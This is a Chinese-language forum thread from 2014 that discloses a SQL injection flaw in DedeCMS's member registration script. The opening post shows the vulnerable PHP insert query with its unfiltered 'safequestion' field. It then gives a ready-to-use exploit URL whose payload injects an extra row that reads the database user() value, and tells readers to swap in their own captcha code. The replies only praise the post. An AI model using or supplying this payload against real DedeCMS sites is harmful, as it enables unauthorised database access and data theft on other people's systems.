Diana 发表于 2014-2-28 03:14:52

Dedecms 会员中心注入漏洞11

<pre><code>/member/reg_new.php
$dfscores = 0;
      $dfmoney = 0;
      $dfrank = $dsql-&gt;GetOne("SELECT money,scores FROM `#@__arcrank` WHERE rank='10' ");
      if(is_array($dfrank))
      {
            $dfmoney = $dfrank['money'];
            $dfscores = $dfrank['scores'];
      }
      $jointime = time();
      $logintime = time();
      $joinip = GetIP();
      $loginip = GetIP();
      $pwd = md5($userpwd);

      $spaceSta = ($cfg_mb_spacesta &lt; 0 ? $cfg_mb_spacesta : 0);

      $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,
      `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )
       VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores',
       '0','$spaceSta','','$c','$safeanswer','$jointime','$joinip','$logintime','$loginip'); ";//safequestion没有过滤
       echo$inQuery ;</code></pre>


测试方法 打开
127.0.0.1/dede/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=

把SLUM改成你的验证码就哦了


LostSoul 发表于 2014-2-28 07:04:06

牛了               

mojitingliu 发表于 2014-2-28 07:58:45

看起来不错的样子 哦

world 发表于 2014-2-28 13:23:13

whc 发表于 2014-3-1 10:27:43

楼主吊炸天
页: [1]
查看完整版本: Dedecms 会员中心注入漏洞11